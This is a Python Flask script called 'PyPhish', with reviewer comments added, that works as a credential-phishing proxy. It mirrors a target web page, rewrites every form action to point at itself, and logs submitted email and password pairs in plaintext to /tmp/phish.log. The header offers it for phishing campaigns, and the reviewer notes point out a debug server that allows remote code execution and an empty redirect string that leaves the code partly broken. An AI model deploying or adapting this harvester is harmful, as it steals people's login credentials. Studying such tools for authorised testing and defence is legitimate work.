#!/usr/bin/env python
'''
Written by @dustyfresh (c) 06-11-16

ABOUT:
PyPhish is a method of phishing using Python's flask and requests modules
instead of PHP and HTML. PyPhish will grab a page and display it to the user
as the original would appear. PyPhish acts as a proxy but changes the
action="some file or url" to redirect all POST & GET data to be logged to
PyPhish. Then PyPhish redirects the user where they're supposed to go.
PyPhish is awesome because you don't have to maintain HTML & PHP template
code for your phishing campaigns.

This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation; Version 2 (or later) with the clarifications and exceptions
described in the license file. This guarantees your right to use, modify, and
redistribute this software under certain conditions. If you wish to embed
this technology into proprietary software, we sell alternative licenses
(contact @dustyfresh).

NOTICE:
The author of this software is not responsible for illegal abuse of this
code. The user of this code agrees to have legal consent prior to performing
any sort of phishing on live targets. This is for educational and, in some
cases with permission, professional use only.
'''
import re
from flask import Flask, request
import requests

# Page that mirror() fetches and re-serves. Empty as published, so
# requests.get(url) has nothing to fetch until a value is set here.
url = ''

def mirror():
    """Fetch ``url`` and return its HTML with form ``action`` values rewritten.

    Every double-quoted ``action="..."`` attribute value in the response text
    is replaced with ``/``, so a form on the mirrored page submits to this
    application's own ``/`` route instead of the original endpoint.

    Returns:
        The rewritten response body as text.
    """
    # The outbound fetch always carries this fixed Chrome 41 User-Agent and a
    # Referer equal to the fetched URL itself. NOTE(review): on the mirrored
    # site's side these two headers, repeated from one client address, are the
    # visible trace of this proxy in access logs.
    headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Referer': '{}'.format(url)}
    req = requests.get(url, headers=headers)
    # Below we are using a regex sub to rewrite the HTML to change action="" within the login form.
    # The lookbehind anchors on the literal text action=" and the lazy group
    # consumes up to the next double quote; the substitution is applied to
    # every match in the document, not only to one form.
    data = re.sub(r'(?<=action\=\")(.*?)\"', '/"', req.text)
    return data

def phish(email,password):
    """Append one ``email:password`` line to ``/tmp/phish.log``.

    NOTE(review): submitted values are written in plaintext to a fixed path
    under /tmp. In an authorised exercise these are real user secrets, so
    this file is the sensitive artefact to account for and purge afterwards.
    """
    with open("/tmp/phish.log", "a") as log:
        log.write('{}:{}\n'.format(email,password))

pyphish = Flask(__name__)

@pyphish.route('/', methods=['POST', 'GET'])
def home():
    """Handle ``/``: log submitted form fields on POST, serve the mirror on GET.

    Any exception raised inside the handler is caught, printed to stdout, and
    the function then ends without an explicit return value.
    """
    try:
        # If the incoming request is a POST request then intercept form credentials
        if request.method == 'POST':
            # Below is where we set the POST variables from the form to intercept
            # credentials and send them to our phish() logger function
            # send to our logging function
            # Only the form fields named 'email' and 'pass' are read; a
            # submission without both raises and lands in the except below.
            phish(request.form['email'], request.form['pass'])
            # Now we will redirect them to the service they were supposed
            # to be using
            # NOTE(review): as it appears here the string literal is empty and
            # has no placeholder, so this returns an empty body and ``url`` is
            # unused. The literal's original content may have been lost when
            # this listing was extracted.
            return ''.format(url)
        elif request.method == 'GET':
            # If the incoming request is a GET request then just display the mirror
            return mirror(), 200
    except Exception as e:
        print("There was an issue :( Here is the error:\n{}".format(e))

if __name__ == '__main__':
    # Listens on every interface, port 80, with Flask debug mode enabled.
    # NOTE(review): debug=True turns on the Werkzeug interactive debugger,
    # which permits code execution on the host from the browser; anyone
    # studying this sample should keep it inside an isolated lab network.
    pyphish.run(host='0.0.0.0', port=80, debug=True, threaded=True)